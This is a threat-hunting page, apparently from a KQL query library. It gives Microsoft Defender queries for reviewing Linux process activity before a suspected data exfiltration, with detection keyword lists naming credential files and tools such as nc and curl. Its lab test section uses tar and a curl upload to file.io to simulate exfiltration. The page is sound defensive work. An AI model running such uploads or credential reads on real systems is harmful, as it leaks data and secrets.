Query Details

Linux User Activity Leading Up To Exfiltration

Query

## Follow‑up pivots (recommended)

### Pivot B – User activity leading up to exfiltration

Use this pivot after a hit from the **Linux – Archive Command Followed by Upload Egress** query. The follow‑up pivots are strongly recommended to establish scope and intent before escalating.

The query returns every process launched on the device in the window; review the command lines to identify:

* Pre‑exfiltration reconnaissance
* Credential access
* Script execution
* Operator behaviour

```kql
// Update DeviceName and time window as required
DeviceProcessEvents
| where DeviceName =~ "DeviceNameHere"
| where Timestamp between (datetime(2026-01-30T14:50:00Z) .. datetime(2026-01-30T15:10:00Z))
| project Timestamp, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
```
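A way to speed up that review, as an added example that is not part of the original query: keep the same device and time scoping, but tag each process event with a coarse category so reconnaissance, credential access, script execution and the archive/egress pair stand out in the timeline. The binary and path keyword lists are illustrative assumptions and will need tuning for your environment.

```kql
// Added example: same scoping as the pivot above, plus a coarse category tag.
// Keyword lists are assumptions for illustration; extend them for your estate.
let TargetDevice = "DeviceNameHere";
let WindowStart = datetime(2026-01-30T14:50:00Z);
let WindowEnd = datetime(2026-01-30T15:10:00Z);
let ReconBinaries = dynamic(["id", "whoami", "hostname", "uname", "ip", "ifconfig", "ss", "netstat", "ps", "find", "locate"]);
let CredentialPaths = dynamic(["/etc/shadow", ".ssh/", "id_rsa", ".aws/credentials", ".bash_history", ".git-credentials", ".kube/config"]);
let Interpreters = dynamic(["bash", "sh", "python", "python3", "perl", "php"]);
let ArchiveTools = dynamic(["tar", "zip", "gzip", "xz", "7z", "7za"]);
let EgressTools = dynamic(["curl", "wget", "scp", "rsync", "sftp", "nc", "ncat"]);
DeviceProcessEvents
| where DeviceName =~ TargetDevice
| where Timestamp between (WindowStart .. WindowEnd)
// First matching branch wins; credential paths are checked before the generic lists
| extend Category = case(
    ProcessCommandLine has_any (CredentialPaths), "CredentialAccess",
    FileName in~ (ReconBinaries), "Recon",
    FileName in~ (Interpreters) and (ProcessCommandLine has_any (".sh", ".py", ".pl") or ProcessCommandLine contains " -c "), "ScriptExecution",
    FileName in~ (ArchiveTools), "Archive",
    FileName in~ (EgressTools), "Egress",
    "Other")
| project Timestamp, AccountName, Category, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
// Ascending order reads as a timeline leading up to the Archive and Egress rows
| order by Timestamp asc
```

Set `WindowStart` a few minutes before the archive timestamp reported by the parent hunt so the lead‑up is captured. The category is a triage aid, not a filter: rows tagged `Other` still need to be read, since an operator's most telling commands are often ordinary `cat`, `ls` or `cd` invocations against sensitive paths.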

---

## Testing and validation guidance

To generate telemetry for this hunt on a lab host (the archive really is uploaded to file.io, a third‑party service, so use throwaway test data only):

```bash
# Run only on a lab host: the archive is actually uploaded to a third-party service
cd /tmp
echo test > a.txt
tar -czf test-exfil.tgz a.txt
# Upload the archive as multipart form field "file"; quote the URL so "?" is not globbed
curl -F "file=@test-exfil.tgz" "https://file.io/?expires=1d"
```

This sequence reliably produces:

* An archive creation event (the `tar` process)
* Outbound upload activity (the `curl` process)
* A correlated hit in the parent hunt, which supplies the device name and timestamp to scope this pivot to

Explanation

This query helps security analysts investigate user activity on a Linux device that may indicate data exfiltration. In brief:

  1. Purpose: It surfaces activity that may have occurred before data left the device, including reconnaissance, credential access, script execution, and general operator behaviour.

  2. How it works:

    • It reads process events (DeviceProcessEvents) for a single device; replace "DeviceNameHere" with the name of the device under investigation.
    • It restricts the search to a time window (January 30, 2026, 14:50 to 15:10 UTC in the example) so that only events around the suspected exfiltration are returned; adjust the window to the timestamps from the parent hunt.
    • It returns the timestamp, the account name, the file name, the command line used to launch the process, and the name of the initiating (parent) process.
    • Results are ordered with the most recent events first.
  3. Testing and validation:

    • The bash sequence creates a test file, archives it with tar, and uploads the archive with curl to a file‑sharing service, mimicking exfiltration so the detection can be validated.

Overall, this query and the accompanying test sequence help analysts establish the scope and intent of a suspected exfiltration by examining the user actions that preceded it on the Linux device.

Details


Nathan Hutchinson

Released: February 2, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessEvents, Timestamp, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName

Operators

=~, between, project, order by
